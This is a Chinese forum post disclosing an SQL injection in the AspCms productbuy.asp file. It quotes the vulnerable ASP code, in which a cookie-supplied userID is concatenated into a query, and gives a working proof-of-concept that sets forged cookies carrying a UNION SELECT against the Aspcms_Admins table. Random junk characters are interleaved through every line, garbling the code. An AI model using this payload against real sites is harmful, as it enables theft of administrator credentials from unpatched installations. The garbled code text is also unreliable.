好久没上土司了,上来一看发现在删号名单内.....
% B1 m0 B3 n( u也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。' h% t' U+ E3 S5 z' G
废话不多说,看代码:: a4 x: u9 X$ c# }
; D) K) O, [6 Z9 k* Z, o
<% y% `/ G# \$ |3 l! r! y. f) j
+ W% J3 `! U) {2 M' i8 j
if action = "buy" then$ V. o; s6 a0 ?4 l8 k
& @) B2 M5 [. d addOrder()
: ~$ K+ G& A& [1 H0 \! F' @8 z
2 e$ _: G, O3 oelse
4 c2 j7 q( h8 O* m( M& ^, b1 e) B S2 N# ^8 o
echoContent()2 }& M D+ R2 d% P" Z
+ E- `+ |: U, g! `! X% I \end if' I. r6 e) u$ Y3 C
! H$ N \' {: {# V6 l$ f) g
* Q( m3 }/ R+ r+ T; C
6 A1 T% E! Y5 z7 G& c……略过
* \% h- E# B- p3 d2 H2 D. J! I" i. F3 y$ f$ G E
* [ I7 D$ J6 X1 f4 Z) Y# X
8 X, @" ?1 u5 y6 t* O; t- ~Sub echoContent()0 l3 k# ?; K" B' v: t
' {5 w" v/ u$ M/ r
dim id( y% K8 p( x" O3 q
. x& t8 Z n8 v" d9 @% A% t+ Y
id=getForm("id","get")
0 w: B- m; N9 \( G
, ^ D, t" O b: U7 x7 A* Q. k & T0 a% m: r& F8 F$ M
) M0 n' Z& m% W4 Q& w8 K' J% s
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" . c8 i+ V! P- y _
7 }" O* e3 _& I- Z3 f " n. a' w+ j, v. F+ F; H
1 q1 S, b6 \0 J: c2 v/ U
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
1 l+ e0 {: r) v: k# F# x7 I
, }- G7 o& w9 ?4 z dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct) e; ~' W% A! y! p) i" M
1 ? L) v; L5 N) Z
Dim templatePath,tempStr/ `: Z x$ W7 y C# |! h
1 {+ } e# X, U9 {' H7 @. F' g
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
0 H% `: y6 L- |5 k8 {* [4 f6 z! K1 ?" P3 S% M4 u
" x2 [$ O& }, a4 y5 O- F7 i& A! n" k
! I8 {1 W/ I' l0 o) C
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
, h1 ~$ t% O" J0 F3 v! c0 s" p4 n1 ?" h2 Q, c5 j+ m: N) Z* H
selectproduct=rsObj(0)8 C- l; G* ~2 N
+ N, J! \/ p. V' R2 S! e
) r# |* e0 o9 t9 j" h8 |) J
" o% G* T" Y; c8 q% M( @ [ Dim linkman,gender,phone,mobile,email,qq,address,postcode2 v7 Y+ y+ @6 W* S
0 v/ v& d9 @. F$ }
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
$ Q6 b9 |4 K8 M
! y+ H$ Q1 u' a( D5 o7 G: H7 \9 E p9 S6 w if rCookie("loginstatus")=1 then
) v- n4 h8 h9 ?: v8 W; ]- g
# ~/ d& O; [2 T/ ` set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
# ]/ I, g, b5 _1 l* M) v6 a& l8 T) w' u s4 e- c
linkman=rsObj("truename") I7 P& V: C# M
6 j" p: |, I. n+ }5 f, f% f H: @
gender=rsObj("gender")* @* z# Z, |' f0 P3 d; X2 y
1 P; F4 ^" v( [. y
phone=rsObj("phone")
. E! }, Q" }8 O! ?5 p, U0 S4 P
9 w2 }0 G! p' q mobile=rsObj("mobile")
! \/ I2 g- ~# W: s3 ~5 f( Y
( K2 s( U) h2 u email=rsObj("email")
4 ?: d1 {# Q* v% [6 c- Z; a, R j. G: T) m0 E
qq=rsObj("qq")" P* D9 ]$ B8 n+ q' E. w5 e, ^3 s4 d
. S1 {' l, U( ]3 K, q
address=rsObj("address")3 D4 `/ N9 i X* k1 ^
' }# X! A6 Q. u& M5 v postcode=rsObj("postcode")3 g3 U& s. Z9 V2 w; X
: H: q: X; W3 X D! n- j else
' V7 `4 L# u4 H1 h0 O* p* g
" }2 u1 y8 r6 Y! l! u, G6 C: T5 I gender=1
1 }5 e! C8 c1 L$ q4 A, ^+ ?2 G, U6 L
! O: v* Q3 W+ ^8 t end if
. X$ T* q$ v6 F# a5 r
: a5 S; a* c6 q( \6 |# R6 r% [0 o* n4 V9 | rsObj.close()
2 ]. l+ `' ~ @* b
- K* V" e7 I5 Q' ]1 q- @. O ! A, ^' g" {) W6 M
) \ l- T) o$ H3 c) G6 C8 n8 b) }3 e with templateObj
! b4 z2 v/ r# G* {( H- s$ G2 z* X# ~6 a/ k
.content=loadFile(templatePath) 4 R+ [$ [$ P5 a
4 Q; z# d0 X" Q
.parseHtml()2 \9 ^8 V$ z V2 ~1 A* J# L
4 y9 m3 W3 U* [4 q) K1 P
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
9 `( C0 {8 F( Z4 ]7 G1 f0 M4 J8 b. z, S# R9 F& y
.content=replaceStr(.content,"[aspcms:linkman]",linkman) . x6 @' @" a f# s
/ k' h& D( I/ T3 m .content=replaceStr(.content,"[aspcms:gender]",gender)
5 K, j" j, O1 ~1 w, _
" e6 A9 }" p" o9 E9 Z2 z .content=replaceStr(.content,"[aspcms:phone]",phone)
- F5 `; T" V% W! H9 D
) ]; s5 Z! K9 Q, A4 c$ `4 p! M .content=replaceStr(.content,"[aspcms:mobile]",mobile)
: h. r4 I, K$ I- _9 C
; n) {% \% k+ a .content=replaceStr(.content,"[aspcms:email]",email) / F1 J& T$ S7 d8 E
9 r& B, B+ L, c+ S
.content=replaceStr(.content,"[aspcms:qq]",qq)
4 M" v# G& l1 K% Q( T, Q6 }& }9 s0 @. `
.content=replaceStr(.content,"[aspcms:address]",address) # p4 i5 S: a: _+ v8 T4 S) u
k: Y8 _/ u; S! \3 ~! |' u4 `
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
1 \8 A% w( U( e2 `1 x/ J. y
! T) Z* I/ z, J [( L0 k+ C1 s- X .parseCommon() ! d, q# E% A8 I* y G h) Q
# R- ~# M7 I- O. K3 Z
echo .content 6 Y! ~' i$ ]0 v( m# u! V
9 N$ g. G! q) Q) C5 f7 o7 O& ]- z1 p, `
end with
, W( X6 ^ i' E u) A' d9 b: E7 e" T; `
set templateobj =nothing : terminateAllObjects( r. {# I4 x6 K- d* z" T) `7 M
" u# N- k$ V8 oEnd Sub
# t. J8 T% i2 V8 a& F漏洞很明显,没啥好说的0 m% e9 U0 w' y0 s: K; d/ d
poc:6 t+ C9 @# ~% S8 H/ b% F2 W4 B
, X0 W* F! u- {javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子8 g" o# Z! l$ i( H
7 |9 y+ p2 N) y# s4 ]: f
|